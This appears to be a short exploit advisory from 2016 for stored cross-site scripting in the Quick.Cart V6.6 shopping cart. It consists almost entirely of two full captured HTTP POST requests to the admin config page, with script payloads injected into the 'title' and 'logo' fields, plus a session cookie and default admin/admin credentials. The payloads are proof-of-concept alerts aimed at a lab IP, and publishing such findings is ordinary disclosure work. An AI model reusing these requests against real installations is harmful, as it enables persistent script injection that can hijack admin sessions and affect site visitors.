QUICK CART V6.6 Persistent XSS

Standard
# Exploit Title: QUICK CART V6.6 Persistent XSS
# Date: 19/01/2016
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vulnerable Version: V6.6
# Tested on: Linux
#  Vendor doesn’t consider this a vulnerability.

Persistent XSS

Issue No # 1
Persistent XSS on parameter “title”
Request Sent:

POST /admin.php?p=tools-config HTTP/1.1
Host: 192.168.2.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.100/admin.php?p=tools-config&sOption=login-pass
Cookie: PHPSESSID=ijfqciqrrhme9g3rghoj7oatr3; sLogin=admin; bLicense66=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 824
sOption=save+%C2%BB&title=50a77%3c%2ftitle%3e%3cscript%3econfirm(1)%3c%2fscript%3e6f169&default_lang=en&admin_lang=en&skin=default&sorting_products=true&currency_symbol=EUR&hidden_shows=false&display_expanded_menu=true&language_in_url=false&start_page=6&basket_page=15&order_page=16&order_print=18&rules_page=4&page_search=17&admin_list=25&products_list=6&change_files_names=false&delete_unused_files=true&wysiwyg=true&send_customer_order_details=false&display_subcategory_products=true&remember_basket=false&description=Freeware%2C+fast%2C+simple%2C+and+multilingual+shopping+cart+system.+It+is+based+on+Flat+Files%2C+uses+templates+system%2C+valid+XHTML+1.1+and+WAI&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E&slogan=Fast+and+simple+shopping+cart&foot_info=All+rights+reserved&login=admin&pass=admin&orders_email=

 

Quick CART
Issue No # 2
Persistent XSS on parameter “logo”
Request Sent:

POST /admin.php?p=tools-config HTTP/1.1
Host: 192.168.2.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.100/admin.php?p=tools-config&sOption=login-pass
Cookie: PHPSESSID=ijfqciqrrhme9g3rghoj7oatr3; sLogin=admin; bLicense66=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 824
sOption=save+%C2%BB&title=Quick.Cart+-+fast+and+simple+shopping+cart&default_lang=en&admin_lang=en&skin=default&sorting_products=true&currency_symbol=EUR&hidden_shows=false&display_expanded_menu=true&language_in_url=false&start_page=6&basket_page=15&order_page=16&order_print=18&rules_page=4&page_search=17&admin_list=25&products_list=6&change_files_names=false&delete_unused_files=true&wysiwyg=true&send_customer_order_details=false&display_subcategory_products=true&remember_basket=false&description=Freeware%2C+fast%2C+simple%2C+and+multilingual+shopping+cart+system.+It+is+based+on+Flat+Files%2C+uses+templates+system%2C+valid+XHTML+1.1+and+WAI&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E&slogan=Fast+and+simple+shopping+cart&foot_info=All+rights+reserved&login=admin&pass=admin&orders_email=